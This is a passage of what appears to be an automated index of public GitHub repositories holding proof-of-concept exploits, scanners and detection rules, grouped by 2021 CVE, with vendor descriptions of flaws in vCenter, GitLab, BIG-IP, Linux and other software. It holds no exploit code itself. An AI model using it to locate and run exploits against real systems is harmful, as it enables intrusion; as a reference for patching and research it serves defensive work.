- [arnaudluti/PS-CVE-2021-21551](https://github.com/arnaudluti/PS-CVE-2021-21551)
- [mathisvickie/CVE-2021-21551](https://github.com/mathisvickie/CVE-2021-21551)
- [mzakocs/CVE-2021-21551-POC](https://github.com/mzakocs/CVE-2021-21551-POC)
- [ihack4falafel/Dell-Driver-EoP-CVE-2021-21551](https://github.com/ihack4falafel/Dell-Driver-EoP-CVE-2021-21551)
- [tijme/kernel-mii](https://github.com/tijme/kernel-mii)
- [nanabingies/CVE-2021-21551](https://github.com/nanabingies/CVE-2021-21551)
- [Eap2468/CVE-2021-21551](https://github.com/Eap2468/CVE-2021-21551)

### CVE-2021-21716
- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)

### CVE-2021-21809 (2021-06-23)

A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerability.

- [anldori/CVE-2021-21809](https://github.com/anldori/CVE-2021-21809)

### CVE-2021-21972 (2021-02-24)

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).

- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts)
- [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)
- [NS-Sp4ce/CVE-2021-21972](https://github.com/NS-Sp4ce/CVE-2021-21972)
- [yaunsky/CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972)
- [horizon3ai/CVE-2021-21972](https://github.com/horizon3ai/CVE-2021-21972)
- [Osyanina/westone-CVE-2021-21972-scanner](https://github.com/Osyanina/westone-CVE-2021-21972-scanner)
- [alt3kx/CVE-2021-21972](https://github.com/alt3kx/CVE-2021-21972)
- [milo2012/CVE-2021-21972](https://github.com/milo2012/CVE-2021-21972)
- [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972)
- [L-pin/CVE-2021-21972](https://github.com/L-pin/CVE-2021-21972)
- [B1anda0/CVE-2021-21972](https://github.com/B1anda0/CVE-2021-21972)
- [renini/CVE-2021-21972](https://github.com/renini/CVE-2021-21972)
- [stevenp322/cve-2021-21972](https://github.com/stevenp322/cve-2021-21972)
- [GuayoyoCyber/CVE-2021-21972](https://github.com/GuayoyoCyber/CVE-2021-21972)
- [JMousqueton/Detect-CVE-2021-21972](https://github.com/JMousqueton/Detect-CVE-2021-21972)
- [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://github.com/robwillisinfo/VMware_vCenter_CVE-2021-21972)
- [Ma1Dong/vcenter_rce](https://github.com/Ma1Dong/vcenter_rce)
- [d3sh1n/cve-2021-21972](https://github.com/d3sh1n/cve-2021-21972)
- [ByZain/CVE-2021-21972](https://github.com/ByZain/CVE-2021-21972)
- [TaroballzChen/CVE-2021-21972](https://github.com/TaroballzChen/CVE-2021-21972)
- [ZTK-009/CVE-2021-21972](https://github.com/ZTK-009/CVE-2021-21972)
- [murataydemir/CVE-2021-21972](https://github.com/murataydemir/CVE-2021-21972)
- [pettyhacks/vSphereyeeter](https://github.com/pettyhacks/vSphereyeeter)
- [haidv35/CVE-2021-21972](https://github.com/haidv35/CVE-2021-21972)
- [TAI-REx/CVE-2021-21972](https://github.com/TAI-REx/CVE-2021-21972)
- [orangmuda/CVE-2021-21972](https://github.com/orangmuda/CVE-2021-21972)
- [user16-et/cve-2021-21972_PoC](https://github.com/user16-et/cve-2021-21972_PoC)
- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller)

### CVE-2021-21973 (2021-02-24)

The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).

- [freakanonymous/CVE-2021-21973-Automateme](https://github.com/freakanonymous/CVE-2021-21973-Automateme)

### CVE-2021-21974 (2021-02-24)

OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution.

- [Shadow0ps/CVE-2021-21974](https://github.com/Shadow0ps/CVE-2021-21974)
- [n2x4/Feb2023-CVE-2021-21974-OSINT](https://github.com/n2x4/Feb2023-CVE-2021-21974-OSINT)
- [CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi](https://github.com/CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi)
- [hateme021202/cve-2021-21974](https://github.com/hateme021202/cve-2021-21974)

### CVE-2021-21975 (2021-03-31)

Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a Server Side Request Forgery attack to steal administrative credentials.

- [Henry4E36/VMWare-vRealize-SSRF](https://github.com/Henry4E36/VMWare-vRealize-SSRF)
- [dorkerdevil/CVE-2021-21975](https://github.com/dorkerdevil/CVE-2021-21975)
- [Al1ex/CVE-2021-21975](https://github.com/Al1ex/CVE-2021-21975)
- [TheTh1nk3r/exp_hub](https://github.com/TheTh1nk3r/exp_hub)
- [GuayoyoCyber/CVE-2021-21975](https://github.com/GuayoyoCyber/CVE-2021-21975)
- [murataydemir/CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975)
- [rabidwh0re/REALITY_SMASHER](https://github.com/rabidwh0re/REALITY_SMASHER)
- [Vulnmachines/VMWare-CVE-2021-21975](https://github.com/Vulnmachines/VMWare-CVE-2021-21975)

### CVE-2021-21978 (2021-03-03)

VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization lead to arbitrary file upload in the logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file, leading to remote code execution within the logupload container.

- [GreyOrder/CVE-2021-21978](https://github.com/GreyOrder/CVE-2021-21978)
- [me1ons/CVE-2021-21978](https://github.com/me1ons/CVE-2021-21978)
- [skytina/CVE-2021-21978](https://github.com/skytina/CVE-2021-21978)

### CVE-2021-21980 (2021-11-24)

The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.

- [Osyanina/westone-CVE-2021-21980-scanner](https://github.com/Osyanina/westone-CVE-2021-21980-scanner)
- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner)

### CVE-2021-21983 (2021-03-31)

Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API to write files to arbitrary locations on the underlying Photon operating system.

- [murataydemir/CVE-2021-21983](https://github.com/murataydemir/CVE-2021-21983)

### CVE-2021-21985 (2021-05-26)

The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

- [bigbroke/CVE-2021-21985](https://github.com/bigbroke/CVE-2021-21985)
- [alt3kx/CVE-2021-21985_PoC](https://github.com/alt3kx/CVE-2021-21985_PoC)
- [onSec-fr/CVE-2021-21985-Checker](https://github.com/onSec-fr/CVE-2021-21985-Checker)
- [mauricelambert/CVE-2021-21985](https://github.com/mauricelambert/CVE-2021-21985)
- [xnianq/cve-2021-21985_exp](https://github.com/xnianq/cve-2021-21985_exp)
- [daedalus/CVE-2021-21985](https://github.com/daedalus/CVE-2021-21985)
- [testanull/Project_CVE-2021-21985_PoC](https://github.com/testanull/Project_CVE-2021-21985_PoC)
- [haidv35/CVE-2021-21985](https://github.com/haidv35/CVE-2021-21985)
- [aristosMiliaressis/CVE-2021-21985](https://github.com/aristosMiliaressis/CVE-2021-21985)
- [sknux/CVE-2021-21985_PoC](https://github.com/sknux/CVE-2021-21985_PoC)

### CVE-2021-22005 (2021-09-23)

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.

- [1ZRR4H/CVE-2021-22005](https://github.com/1ZRR4H/CVE-2021-22005)
- [pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity)
- [Jeromeyoung/VMWare-CVE-Check](https://github.com/Jeromeyoung/VMWare-CVE-Check)
- [5gstudent/CVE-2021-22005-](https://github.com/5gstudent/CVE-2021-22005-)
- [RedTeamExp/CVE-2021-22005_PoC](https://github.com/RedTeamExp/CVE-2021-22005_PoC)
- [rwincey/CVE-2021-22005](https://github.com/rwincey/CVE-2021-22005)
- [TaroballzChen/CVE-2021-22005-metasploit](https://github.com/TaroballzChen/CVE-2021-22005-metasploit)
- [tiagob0b/CVE-2021-22005](https://github.com/tiagob0b/CVE-2021-22005)
- [Jun-5heng/CVE-2021-22005](https://github.com/Jun-5heng/CVE-2021-22005)
- [shmilylty/cve-2021-22005-exp](https://github.com/shmilylty/cve-2021-22005-exp)
- [InventorMAO/cve-2021-22005](https://github.com/InventorMAO/cve-2021-22005)

### CVE-2021-22006 (2021-09-23)

The vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints.

- [CrackerCat/CVE-2021-22006](https://github.com/CrackerCat/CVE-2021-22006)

### CVE-2021-22015 (2021-09-23)

The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance.

- [PenteraIO/vScalation-CVE-2021-22015](https://github.com/PenteraIO/vScalation-CVE-2021-22015)

### CVE-2021-22053 (2021-11-19)

Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.

- [SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053)
- [Vulnmachines/CVE-2021-22053](https://github.com/Vulnmachines/CVE-2021-22053)

### CVE-2021-22054 (2021-12-17)

VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.

- [MKSx/CVE-2021-22054](https://github.com/MKSx/CVE-2021-22054)

### CVE-2021-22119 (2021-06-29)

Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions.

- [mari6274/oauth-client-exploit](https://github.com/mari6274/oauth-client-exploit)

### CVE-2021-22123 (2021-06-01)

An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.

- [murataydemir/CVE-2021-22123](https://github.com/murataydemir/CVE-2021-22123)

### CVE-2021-22145 (2021-07-21)

A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.

- [niceeeeeeee/CVE-2021-22145-poc](https://github.com/niceeeeeeee/CVE-2021-22145-poc)

### CVE-2021-22146 (2021-07-21)

All versions of Elastic Cloud Enterprise have the Elasticsearch "anonymous" user enabled by default in deployed clusters. While in the default setting the anonymous user has no permissions and is unable to successfully query any Elasticsearch APIs, an attacker could leverage the anonymous user to gain insight into certain details of a deployed cluster.

- [magichk/cve-2021-22146](https://github.com/magichk/cve-2021-22146)

### CVE-2021-22192 (2021-03-24)

An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.2 allowing unauthorized authenticated users to execute arbitrary code on the server.

- [EXP-Docs/CVE-2021-22192](https://github.com/EXP-Docs/CVE-2021-22192)
- [PetrusViet/Gitlab-RCE](https://github.com/PetrusViet/Gitlab-RCE)

### CVE-2021-22201 (2021-04-02)

An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9. A specially crafted import file could read files on the server.

- [exp1orer/CVE-2021-22201](https://github.com/exp1orer/CVE-2021-22201)

### CVE-2021-22204 (2021-04-23)

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing a malicious image.

- [convisolabs/CVE-2021-22204-exiftool](https://github.com/convisolabs/CVE-2021-22204-exiftool)
- [se162xg/CVE-2021-22204](https://github.com/se162xg/CVE-2021-22204)
- [bilkoh/POC-CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204)
- [PenTestical/CVE-2021-22204](https://github.com/PenTestical/CVE-2021-22204)
- [AssassinUKG/CVE-2021-22204](https://github.com/AssassinUKG/CVE-2021-22204)
- [ph-arm/CVE-2021-22204-Gitlab](https://github.com/ph-arm/CVE-2021-22204-Gitlab)
- [Asaad27/CVE-2021-22204-RSE](https://github.com/Asaad27/CVE-2021-22204-RSE)
- [trganda/CVE-2021-22204](https://github.com/trganda/CVE-2021-22204)
- [0xBruno/CVE-2021-22204](https://github.com/0xBruno/CVE-2021-22204)
- [mr-tuhin/CVE-2021-22204-exiftool](https://github.com/mr-tuhin/CVE-2021-22204-exiftool)
- [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204)
- [Akash7350/CVE-2021-22204](https://github.com/Akash7350/CVE-2021-22204)
- [battleofthebots/dejavu](https://github.com/battleofthebots/dejavu)
- [cc3305/CVE-2021-22204](https://github.com/cc3305/CVE-2021-22204)

### CVE-2021-22205 (2021-04-23)

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

- [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205)
- [XTeam-Wing/CVE-2021-22205](https://github.com/XTeam-Wing/CVE-2021-22205)
- [r0eXpeR/CVE-2021-22205](https://github.com/r0eXpeR/CVE-2021-22205)
- [ZZ-SOCMAP/CVE-2021-22205](https://github.com/ZZ-SOCMAP/CVE-2021-22205)
- [Al1ex/CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)
- [whwlsfb/CVE-2021-22205](https://github.com/whwlsfb/CVE-2021-22205)
- [findneo/GitLab-preauth-RCE_CVE-2021-22205](https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205)
- [Seals6/CVE-2021-22205](https://github.com/Seals6/CVE-2021-22205)
- [c0okB/CVE-2021-22205](https://github.com/c0okB/CVE-2021-22205)
- [shang159/CVE-2021-22205-getshell](https://github.com/shang159/CVE-2021-22205-getshell)
- [devdanqtuan/CVE-2021-22205](https://github.com/devdanqtuan/CVE-2021-22205)
- [hh-hunter/cve-2021-22205](https://github.com/hh-hunter/cve-2021-22205)
- [runsel/GitLab-CVE-2021-22205-](https://github.com/runsel/GitLab-CVE-2021-22205-)
- [faisalfs10x/GitLab-CVE-2021-22205-scanner](https://github.com/faisalfs10x/GitLab-CVE-2021-22205-scanner)
- [inspiringz/CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)
- [pizza-power/Golang-CVE-2021-22205-POC](https://github.com/pizza-power/Golang-CVE-2021-22205-POC)
- [DIVD-NL/GitLab-cve-2021-22205-nse](https://github.com/DIVD-NL/GitLab-cve-2021-22205-nse)
- [w0x68y/Gitlab-CVE-2021-22205](https://github.com/w0x68y/Gitlab-CVE-2021-22205)
- [al4xs/CVE-2021-22205-gitlab](https://github.com/al4xs/CVE-2021-22205-gitlab)
- [honypot/CVE-2021-22205](https://github.com/honypot/CVE-2021-22205)
- [momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-](https://github.com/momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-)
- [keven1z/CVE-2021-22205](https://github.com/keven1z/CVE-2021-22205)
- [hhhotdrink/CVE-2021-22205](https://github.com/hhhotdrink/CVE-2021-22205)
- [sei-fish/CVE-2021-22205](https://github.com/sei-fish/CVE-2021-22205)
- [overgrowncarrot1/DejaVu-CVE-2021-22205](https://github.com/overgrowncarrot1/DejaVu-CVE-2021-22205)
- [Hikikan/CVE-2021-22205](https://github.com/Hikikan/CVE-2021-22205)
- [NukingDragons/gitlab-cve-2021-22205](https://github.com/NukingDragons/gitlab-cve-2021-22205)
- [cc3305/CVE-2021-22205](https://github.com/cc3305/CVE-2021-22205)

### CVE-2021-22206 (2021-05-06)

An issue has been discovered in GitLab affecting all versions starting from 11.6. Pull mirror credentials are exposed in a way that allows other maintainers to view the credentials in plain text.

- [dannymas/CVE-2021-22206](https://github.com/dannymas/CVE-2021-22206)

### CVE-2021-22214 (2021-06-08)

When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker, even on a GitLab instance where registration is limited.

- [aaminin/CVE-2021-22214](https://github.com/aaminin/CVE-2021-22214)
- [Vulnmachines/gitlab-cve-2021-22214](https://github.com/Vulnmachines/gitlab-cve-2021-22214)
- [ZZ-SOCMAP/CVE-2021-22214](https://github.com/ZZ-SOCMAP/CVE-2021-22214)

### CVE-2021-22555 (2021-07-07)

A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user namespaces.

- [JoneyJunior/cve-2021-22555](https://github.com/JoneyJunior/cve-2021-22555)
- [xyjl-ly/CVE-2021-22555-Exploit](https://github.com/xyjl-ly/CVE-2021-22555-Exploit)
- [cgwalters/container-cve-2021-22555](https://github.com/cgwalters/container-cve-2021-22555)
- [daletoniris/CVE-2021-22555-esc-priv](https://github.com/daletoniris/CVE-2021-22555-esc-priv)
- [veritas501/CVE-2021-22555-PipeVersion](https://github.com/veritas501/CVE-2021-22555-PipeVersion)
- [masjohncook/netsec-project](https://github.com/masjohncook/netsec-project)
- [tukru/CVE-2021-22555](https://github.com/tukru/CVE-2021-22555)
- [pashayogi/CVE-2021-22555](https://github.com/pashayogi/CVE-2021-22555)
- [letsr00t/-2021-LOCALROOT-CVE-2021-22555](https://github.com/letsr00t/-2021-LOCALROOT-CVE-2021-22555)
- [letsr00t/CVE-2021-22555](https://github.com/letsr00t/CVE-2021-22555)

### CVE-2021-22569 (2022-01-07)

An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.

- [Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java](https://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java)

### CVE-2021-22873 (2021-01-21)

Revive Adserver before 5.1.0 is vulnerable to open redirects via the `dest`, `oadest`, and/or `ct0` parameters of the lg.php and ck.php delivery scripts. Such open redirects had previously been available by design to allow third party ad servers to track such metrics when delivering ads. However, third party click tracking via redirects is not a viable option anymore, leading to such open redirect functionality being removed and reclassified as a vulnerability.

- [K3ysTr0K3R/CVE-2021-22873-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-22873-EXPLOIT)

### CVE-2021-22880 (2021-02-11)

The PostgreSQL adapter in Active Record before 6.1.2.1, 6.0.3.5, 5.2.4.5 suffers from a regular expression denial of service (REDoS) vulnerability. Carefully crafted input can cause the input validation in the `money` type of the PostgreSQL adapter in Active Record to spend too much time in a regular expression, resulting in the potential for a DoS attack. This only impacts Rails applications that are using PostgreSQL along with money type columns that take user input.

- [halkichi0308/CVE-2021-22880](https://github.com/halkichi0308/CVE-2021-22880)

### CVE-2021-22893 (2021-04-23)

Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.

- [ZephrFish/CVE-2021-22893_HoneyPoC2](https://github.com/ZephrFish/CVE-2021-22893_HoneyPoC2)
- [Mad-robot/CVE-2021-22893](https://github.com/Mad-robot/CVE-2021-22893)
- [orangmuda/CVE-2021-22893](https://github.com/orangmuda/CVE-2021-22893)

### CVE-2021-22911 (2021-05-27)

An improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 and 3.13 that could lead to unauthenticated NoSQL injection, potentially resulting in RCE.

- [CsEnox/CVE-2021-22911](https://github.com/CsEnox/CVE-2021-22911)
- [optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911](https://github.com/optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911)
- [jayngng/CVE-2021-22911](https://github.com/jayngng/CVE-2021-22911)
- [ChrisPritchard/CVE-2021-22911-rust](https://github.com/ChrisPritchard/CVE-2021-22911-rust)
- [MrDottt/CVE-2021-22911](https://github.com/MrDottt/CVE-2021-22911)
- [overgrowncarrot1/CVE-2021-22911](https://github.com/overgrowncarrot1/CVE-2021-22911)
- [Weisant/CVE-2021-22911-EXP](https://github.com/Weisant/CVE-2021-22911-EXP)

### CVE-2021-22924 (2021-08-05)

libcurl keeps previously used connections in a connection pool for subsequent transfers to reuse, if one of them matches the setup. Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*, which could lead to libcurl reusing wrong connections. File paths are, or can be, case sensitive on many systems but not all, and can even vary depending on the file system used. The comparison also didn't include the 'issuer cert' which a transfer can set to qualify how to verify the server certificate.

- [Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924](https://github.com/Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924)

### CVE-2021-22941 (2021-09-23)

Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.

- [hoavt184/CVE-2021-22941](https://github.com/hoavt184/CVE-2021-22941)

### CVE-2021-22986 (2021-03-31)

On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.

- [dorkerdevil/CVE-2021-22986-Poc](https://github.com/dorkerdevil/CVE-2021-22986-Poc)
- [S1xHcL/f5_rce_poc](https://github.com/S1xHcL/f5_rce_poc)
- [Osyanina/westone-CVE-2021-22986-scanner](https://github.com/Osyanina/westone-CVE-2021-22986-scanner)
- [safesword/F5_RCE](https://github.com/safesword/F5_RCE)
- [microvorld/CVE-2021-22986](https://github.com/microvorld/CVE-2021-22986)
- [Al1ex/CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986)
- [kiri-48/CVE-2021-22986](https://github.com/kiri-48/CVE-2021-22986)
- [ZephrFish/CVE-2021-22986_Check](https://github.com/ZephrFish/CVE-2021-22986_Check)
- [yaunsky/CVE-202122986-EXP](https://github.com/yaunsky/CVE-202122986-EXP)
- [Tas9er/CVE-2021-22986](https://github.com/Tas9er/CVE-2021-22986)
- [dotslashed/CVE-2021-22986](https://github.com/dotslashed/CVE-2021-22986)
- [DDestinys/CVE-2021-22986](https://github.com/DDestinys/CVE-2021-22986)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [amitlttwo/CVE-2021-22986](https://github.com/amitlttwo/CVE-2021-22986)
- [huydung26/CVE-2021-22986](https://github.com/huydung26/CVE-2021-22986)

### CVE-2021-23017 (2021-06-01)

A security issue in the nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause a 1-byte memory overwrite, resulting in a worker process crash or potential other impact.

- [niandy/nginx-patch](https://github.com/niandy/nginx-patch)
- [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC)
- [lakshit1212/CVE-2021-23017-PoC](https://github.com/lakshit1212/CVE-2021-23017-PoC)
- [ShivamDey/CVE-2021-23017](https://github.com/ShivamDey/CVE-2021-23017)

### CVE-2021-23132 (2021-03-04)

An issue was discovered in Joomla! 3.0.0 through 3.9.24. com_media allowed paths that are not intended for image uploads.

- [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)

### CVE-2021-23358 (2021-03-29)

The package underscore from 1.13.0-0 and before 1.13.0-2, and from 1.3.2 and before 1.12.1, is vulnerable to Arbitrary Code Injection via the template function, particularly when a variable property is passed as an argument, as it is not sanitized.

- [EkamSinghWalia/Detection-script-for-cve-2021-23358](https://github.com/EkamSinghWalia/Detection-script-for-cve-2021-23358)
- [MehdiBoukhobza/SandBox_CVE-2021-23358](https://github.com/MehdiBoukhobza/SandBox_CVE-2021-23358)

### CVE-2021-23369 (2021-04-12)

The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

- [fazilbaig1/CVE-2021-23369](https://github.com/fazilbaig1/CVE-2021-23369)

### CVE-2021-23383 (2021-05-04)

The package handlebars before 4.7.7 is vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.

- [dn9uy3n/Check-CVE-2021-23383](https://github.com/dn9uy3n/Check-CVE-2021-23383)
- [fazilbaig1/CVE-2021-23383](https://github.com/fazilbaig1/CVE-2021-23383)

### CVE-2021-23410
- [azu/msgpack-CVE-2021-23410-test](https://github.com/azu/msgpack-CVE-2021-23410-test)

### CVE-2021-23639 (2021-12-10)

The package md-to-pdf before 5.0.0 is vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content without disabling the JS engine.

- [MohandAcherir/CVE-2021-23639](https://github.com/MohandAcherir/CVE-2021-23639)

### CVE-2021-23758 (2021-12-03)

All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution.

- [numanturle/CVE-2021-23758-POC](https://github.com/numanturle/CVE-2021-23758-POC)

### CVE-2021-23840 (2021-02-16)

Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).

- [Trinadh465/openssl-1.1.1g_CVE-2021-23840](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2021-23840)

### CVE-2021-23841 (2021-02-16)

The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).

- [Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841](https://github.com/Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841)
